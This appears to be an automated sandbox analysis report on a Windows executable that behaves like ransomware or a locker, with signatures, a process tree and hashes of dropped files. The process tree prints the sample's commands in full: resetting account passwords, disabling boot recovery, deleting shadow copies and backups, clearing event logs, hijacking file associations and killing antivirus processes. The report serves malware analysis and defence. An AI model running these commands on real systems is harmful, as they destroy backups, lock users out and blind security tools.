Resubmissions

18-04-2024 18:50

240418-xha8wabh29 10

01-01-2024 15:12

240101-slnwxsfeh4 10

Analysis

  • max time kernel
    1802s
  • max time network
    1820s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18-04-2024 18:50

General

  • Target

    9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795.exe

  • Size

    1.3MB

  • MD5

    22a975eb038011095e8b9ff9a3078ffa

  • SHA1

    f2762fb4a819dad55daf7ae3f9e96753f04df94c

  • SHA256

    9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795

  • SHA512

    6cecf00b511ac39acf1b5920996b920787e13c6fbc9cc3fe46526c044f0d6813da55ee88205b8138033b55915ae6fd31c1149bef07b3116cb2459de017334a52

  • SSDEEP

    24576:qI0Clbs7Kjsbs0pwKR1aQ9qVLUOHkXzWsfI9mO35s8RI93VZ4+nnI6i207pCS1Rp:oClbs7Kjsbs0pdR199qVLUOHkDWsfimT

Malware Config

Signatures

  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 30 IoCs
  • Drops autorun.inf file 1 TTPs 2 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 27 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795.exe
    "C:\Users\Admin\AppData\Local\Temp\9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795.exe"
    1⤵
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C cmd.exe /c net users %username% LOCKEDBYROZBEH
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c net users Admin LOCKEDBYROZBEH
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\SysWOW64\net.exe
          net users Admin LOCKEDBYROZBEH
          4⤵
            PID:2256
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 users Admin LOCKEDBYROZBEH
              5⤵
                PID:1060
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C cmd.exe /c net users Administrator LOCKEDBYROZBEH
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c net users Administrator LOCKEDBYROZBEH
            3⤵
              PID:1092
              • C:\Windows\SysWOW64\net.exe
                net users Administrator LOCKEDBYROZBEH
                4⤵
                  PID:1984
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 users Administrator LOCKEDBYROZBEH
                    5⤵
                      PID:2060
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C cmd.exe /c net user %username% LOCKEDBYROZBEH
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2636
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c net user Admin LOCKEDBYROZBEH
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1176
                  • C:\Windows\SysWOW64\net.exe
                    net user Admin LOCKEDBYROZBEH
                    4⤵
                      PID:1876
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user Admin LOCKEDBYROZBEH
                        5⤵
                          PID:3008
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C cmd.exe /c net user Administrator LOCKEDBYROZBEH
                    2⤵
                      PID:2676
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c net user Administrator LOCKEDBYROZBEH
                        3⤵
                          PID:1196
                          • C:\Windows\SysWOW64\net.exe
                            net user Administrator LOCKEDBYROZBEH
                            4⤵
                              PID:2384
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 user Administrator LOCKEDBYROZBEH
                                5⤵
                                  PID:3040
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C cmd.exe /c bcdedit /set {default} recoveryenabled No
                            2⤵
                              PID:2652
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c bcdedit /set {default} recoveryenabled No
                                3⤵
                                  PID:2904
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                2⤵
                                  PID:1648
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                    3⤵
                                      PID:820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C cmd.exe /c vssadmin delete shadows /all /quiet
                                    2⤵
                                      PID:1044
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c vssadmin delete shadows /all /quiet
                                        3⤵
                                          PID:3036
                                          • C:\Windows\SysWOW64\vssadmin.exe
                                            vssadmin delete shadows /all /quiet
                                            4⤵
                                            • Interacts with shadow copies
                                            PID:2724
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest
                                        2⤵
                                          PID:2136
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest
                                            3⤵
                                              PID:1544
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                            2⤵
                                              PID:932
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                3⤵
                                                  PID:2120
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C cmd.exe /c wbadmin delete catalog quiet
                                                2⤵
                                                  PID:2008
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c wbadmin delete catalog quiet
                                                    3⤵
                                                      PID:2920
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C cmd.exe /c wevtutil cl system
                                                    2⤵
                                                      PID:1592
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c wevtutil cl system
                                                        3⤵
                                                          PID:2244
                                                          • C:\Windows\SysWOW64\wevtutil.exe
                                                            wevtutil cl system
                                                            4⤵
                                                            • Clears Windows event logs
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1532
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C cmd.exe /c wevtutil cl security
                                                        2⤵
                                                          PID:1740
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c wevtutil cl security
                                                            3⤵
                                                              PID:396
                                                              • C:\Windows\SysWOW64\wevtutil.exe
                                                                wevtutil cl security
                                                                4⤵
                                                                • Clears Windows event logs
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2320
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C cmd.exe /c wevtutil cl application
                                                            2⤵
                                                              PID:1516
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c wevtutil cl application
                                                                3⤵
                                                                  PID:1156
                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                    wevtutil cl application
                                                                    4⤵
                                                                    • Clears Windows event logs
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2392
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C cmd.exe /c wmic SHADOWCOPY /nointeractive
                                                                2⤵
                                                                  PID:2908
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /c wmic SHADOWCOPY /nointeractive
                                                                    3⤵
                                                                      PID:3032
                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                        wmic SHADOWCOPY /nointeractive
                                                                        4⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2364
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C cmd.exe /c wmic shadowcopy delete
                                                                    2⤵
                                                                      PID:1536
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c wmic shadowcopy delete
                                                                        3⤵
                                                                          PID:2576
                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                            wmic shadowcopy delete
                                                                            4⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2708
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C cmd.exe /c assoc .lnk=NoBitchesFile && assoc .exe=NoBitchesFile && assoc .js=NoBitchesFile && assoc .dll=NoBitchesFile && assoc .vbs=NoBitchesFile && assoc .vbe=NoBitchesFile && assoc .ps1=NoBitchesFile && assoc .com=NoBitchesFile && assoc .bat=NoBitchesFile && assoc .cmd=NoBitchesFile && assoc .rb=NoBitchesFile && assoc .pl=NoBitchesFile && assoc .jar=NoBitchesFile
                                                                        2⤵
                                                                        • Modifies registry class
                                                                        PID:760
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c assoc .lnk=NoBitchesFile
                                                                          3⤵
                                                                          • Modifies registry class
                                                                          PID:2568
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C cmd.exe /c taskkill /im ComboCleaner.exe /f
                                                                        2⤵
                                                                          PID:1632
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /c taskkill /im ComboCleaner.exe /f
                                                                            3⤵
                                                                              PID:1728
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im ComboCleaner.exe /f
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:816
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C cmd.exe /c echo ^[autorun^] > ..\autorun.inf
                                                                            2⤵
                                                                            • Drops autorun.inf file
                                                                            PID:1040
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C cmd.exe /c echo open^=WindowsScan^.exe >> ..\autorun.inf
                                                                            2⤵
                                                                            • Drops autorun.inf file
                                                                            PID:2084
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /c echo open=WindowsScan.exe
                                                                              3⤵
                                                                                PID:2396
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
                                                                              2⤵
                                                                                PID:1376
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
                                                                                  3⤵
                                                                                    PID:2592
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh Interface Set Interface Wi-Fi 12 disable
                                                                                      4⤵
                                                                                        PID:2288
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f
                                                                                    2⤵
                                                                                      PID:1908
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c taskkill /im chrome.exe /f
                                                                                        3⤵
                                                                                          PID:2428
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im chrome.exe /f
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:560
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\cmd.exe
                                                                                        2⤵
                                                                                        • Modifies registry class
                                                                                        PID:2316
                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                      C:\Windows\system32\vssvc.exe
                                                                                      1⤵
                                                                                        PID:2952

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\PROGRA~2\MICROS~1\Office14\GROOVEEX.DLL

                                                                                        Filesize

                                                                                        4.0MB

                                                                                        MD5

                                                                                        3a949282b9bd8443e76f68e667b7b280

                                                                                        SHA1

                                                                                        cde9e9a24a5d4f936ce31f136f24dbfb416dd64c

                                                                                        SHA256

                                                                                        1a45650e297d7cf85a29227137c7fd7524949de980a0543b8acb6dad8955a388

                                                                                        SHA512

                                                                                        ac09f26b016510736287ba842c89a2a53f602ed225defb5ea2aaed5c40eca8ea0d481d3fb6e691dc95db33897b62c81434cf4a05cf4a8304d97316c55523e070

                                                                                      • C:\PROGRA~2\MICROS~1\Office14\OIS.EXE

                                                                                        Filesize

                                                                                        267KB

                                                                                        MD5

                                                                                        47cfb05bb17a6c2d9e6948f12f8ed7e5

                                                                                        SHA1

                                                                                        45bf92c7bf1eb6e829294a197da05b6618fd7e7f

                                                                                        SHA256

                                                                                        7811d4a1e9c5eb3de6aa0dc59c0215e804376a93a719ead6bc2a09b23d77542b

                                                                                        SHA512

                                                                                        3ddef21ab2d30c460f6cff21e80bea4ce237b22047994042ce8329f7fa375e69f3a7d942e62e2425b2fc40b16f058b129058559f0f3bbcee77802473bb7e7abf

                                                                                      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

                                                                                        Filesize

                                                                                        341KB

                                                                                        MD5

                                                                                        8b82a5fa188385ba27dbb6e3358961c2

                                                                                        SHA1

                                                                                        850d92e914a330494c9c8e9bfff17898235d7e59

                                                                                        SHA256

                                                                                        fbc1a6e137181a8a3d7cbbb16c6a5db2b3f4797a5f25ce125ab995f932c0a889

                                                                                        SHA512

                                                                                        86f9574078df5dfa5f577c4f4508fe9b839d8afe9ba697d2b275d2996529a4bdb591f3850c0b0ef2f0d11e846569af87cd0e191a6b15a86ded9e684371a099ae

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_OFF.GIF

                                                                                        Filesize

                                                                                        344B

                                                                                        MD5

                                                                                        033fca8035f852d1793445e2d440d7b9

                                                                                        SHA1

                                                                                        09064f46b4d7f9ca01d0d82b5b45678fa35d48be

                                                                                        SHA256

                                                                                        67eea18fc9c7192a93c070b80f350ebb78a6beae1453f03122a71539c6b97de7

                                                                                        SHA512

                                                                                        6cee0c203132566a00f26765c2943a30a44a91902993b2a09df36ad3f1e7911098283846009587d8f03504a3cd0f037f83d390f81a47c29a2d8acfe1574e2418

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\TAB_ON.GIF

                                                                                        Filesize

                                                                                        224B

                                                                                        MD5

                                                                                        4961d1e19970c262cd928df897b91b40

                                                                                        SHA1

                                                                                        77444883f212ace904b4c01697a83e89ea0dad16

                                                                                        SHA256

                                                                                        89c902d0e13a37432ad05cc21bd8689f965d2db1d2397b5f57bc4a12a403fa79

                                                                                        SHA512

                                                                                        450f671dc9fcb622647f7b03368ab9b520a09f8fe3e2fac6bd10930d37debf9e706466e48a2024bf91506223192d3b68b2a9cea7a2436889780f24a5e8c101b7

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK

                                                                                        Filesize

                                                                                        120B

                                                                                        MD5

                                                                                        cecd79c476fb755bff8d1dee43656e4d

                                                                                        SHA1

                                                                                        8092eb7a3e05185450e795f562ed902679f312db

                                                                                        SHA256

                                                                                        1168cd10acfa58ef0cd941ac81d8c238edd301afc0137fbc4f46549d6bb64e75

                                                                                        SHA512

                                                                                        bcdc6d22193c682c34091a96bf253299a0d97a7169f93cc63a382b9a50ebd71976078d3958102c7b7cebaa5b7062963984ad921a74d7c84342396babc2cc2ea0

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK

                                                                                        Filesize

                                                                                        120B

                                                                                        MD5

                                                                                        1121e293cab5d0255a2e591718999ba8

                                                                                        SHA1

                                                                                        585e3b820b503d92c27576f534b05e99c96685cb

                                                                                        SHA256

                                                                                        aaac01ec688c0bb00d15ae21786fb72f423e388dfd14bb5245803bca3d208460

                                                                                        SHA512

                                                                                        f5231f5869a732575a047fcbc719244b322faa8783a814b275bf0afbc764a83489e1d60b7cf6004d68af01ac0acc0141e9458ae7394ced13a5a9fc07f0cc7a58

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\BUTTON.GIF

                                                                                        Filesize

                                                                                        192B

                                                                                        MD5

                                                                                        ce384af0fd3ec8a8979f63e3b1a1014a

                                                                                        SHA1

                                                                                        eed8c02b3bc34069358d6a0923f4c83a32a61479

                                                                                        SHA256

                                                                                        6ff9cd8ee458e2217354683615ea2c3540b0c9866de593533432995855a13537

                                                                                        SHA512

                                                                                        4ad2d6d1faf25f54d6a0a3c90f668b2635a9a90c48a0079730e6f4b712f91de1828eb8ea77f5335a3ece4795afbe3bf00d53c9eb1969ea7214242f9909f41423

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF

                                                                                        Filesize

                                                                                        504B

                                                                                        MD5

                                                                                        10f34180a5eba783355578e6d806479a

                                                                                        SHA1

                                                                                        9bef16dd8c5ccdc82542952075c79cedbcd3a9c8

                                                                                        SHA256

                                                                                        2008f8f5f230b707bca296197d90b96bc0304e3a6d58798a0f4f6f097b54ecd1

                                                                                        SHA512

                                                                                        ef0c7c5dd14a138eb1758e254410bd8b7a69050ca54d0271f68064b068bd5b0c1f6de728aa04f56effa5523623d42af9f2890c3d435e93c7789faa54fe077991

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        3525e4a86067894b8540fc34046f6d25

                                                                                        SHA1

                                                                                        a49a5ea719063ea7005720dd885ce947d66930ce

                                                                                        SHA256

                                                                                        d640c97cdac506116754e195ce8cf16f1e7a580564f047e13ca9ada862b6d01c

                                                                                        SHA512

                                                                                        0cc954960ca7820ee12c44190a51743ada9a7793a1a49a3b288d4180cd513b3add9c5f21386a62a48d248802c76a2fb766c40a490d85010036fecd5a61ac2ebd

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML

                                                                                        Filesize

                                                                                        808B

                                                                                        MD5

                                                                                        a0692882d5675eb699ac8ccf27803d5b

                                                                                        SHA1

                                                                                        a09c71f907fdade3d714aa0259c82ca2ad9e3cab

                                                                                        SHA256

                                                                                        0131a47810d3e6d5ecbcb359f24b4c5dd086fc07522b9c1af0a63398aaa58ac9

                                                                                        SHA512

                                                                                        974ba90868d41a62d15970097ff951d3b406a32639006c3d3e22180f7b51f8392150117e2ff83a1cd563355a4516e7d084e6a46b741a9203c8475b76cf2d7cd1

                                                                                      • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

                                                                                        Filesize

                                                                                        1.4MB

                                                                                        MD5

                                                                                        8dbef05dc88644417e1f976f66cb86cf

                                                                                        SHA1

                                                                                        c06b89c118bd729962e1e8e5bff316d0695cf600

                                                                                        SHA256

                                                                                        d5d561db029d1a61c5a213ae2d408b9e5b48e9c7d29617b2d9714b9b7ff84e9b

                                                                                        SHA512

                                                                                        f3e324ee1043244880a86f31b0adaf7934830508cb3a5334a59fa7a1e92d519cf8f17e73149aa97220afe687989da031cc7cc137aebd17c943bbee4ec627f7cf

                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs

                                                                                        Filesize

                                                                                        8B

                                                                                        MD5

                                                                                        6c8b2128eae4d17dc492a9c5b0a2f415

                                                                                        SHA1

                                                                                        5bbfb3928ff233478cc5622972b5db1f854cc067

                                                                                        SHA256

                                                                                        f887f9f5a73df0856e068e5cb0938586d02eee687acec8ed9fedb8e9df10e9eb

                                                                                        SHA512

                                                                                        6096d485041c55c9f6901f9b90dba86b15b4107ea907ba7c06a29280dc674fd30fbfed4ab5abd046b569534ed160309848b9ea206ec6780281abc5bea073bfb6

                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\m9nu9nej.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

                                                                                        Filesize

                                                                                        48KB

                                                                                        MD5

                                                                                        bc3769413689289353ec9c706cf14193

                                                                                        SHA1

                                                                                        609f3a77422f7171b80de3d6b4dfc242ab9104e7

                                                                                        SHA256

                                                                                        45e21afcb69bd024c4f8e26e6f02c4febc75005f3c374644a3260ee28d5c51ad

                                                                                        SHA512

                                                                                        b7526391d7a26eb76720351472a2203510643937b6a79a5539ffbefef77efd2eeec38993ebbb984ef30e2138bc2b7463611be7270c10e384020a21292a29feef

                                                                                      • memory/1708-0-0x0000000000CD0000-0x0000000000E2A000-memory.dmp

                                                                                        Filesize

                                                                                        1.4MB

                                                                                      • memory/1708-4-0x0000000004D90000-0x0000000004DD0000-memory.dmp

                                                                                        Filesize

                                                                                        256KB

                                                                                      • memory/1708-3-0x0000000074DB0000-0x000000007549E000-memory.dmp

                                                                                        Filesize

                                                                                        6.9MB

                                                                                      • memory/1708-2-0x0000000004D90000-0x0000000004DD0000-memory.dmp

                                                                                        Filesize

                                                                                        256KB

                                                                                      • memory/1708-1-0x0000000074DB0000-0x000000007549E000-memory.dmp

                                                                                        Filesize

                                                                                        6.9MB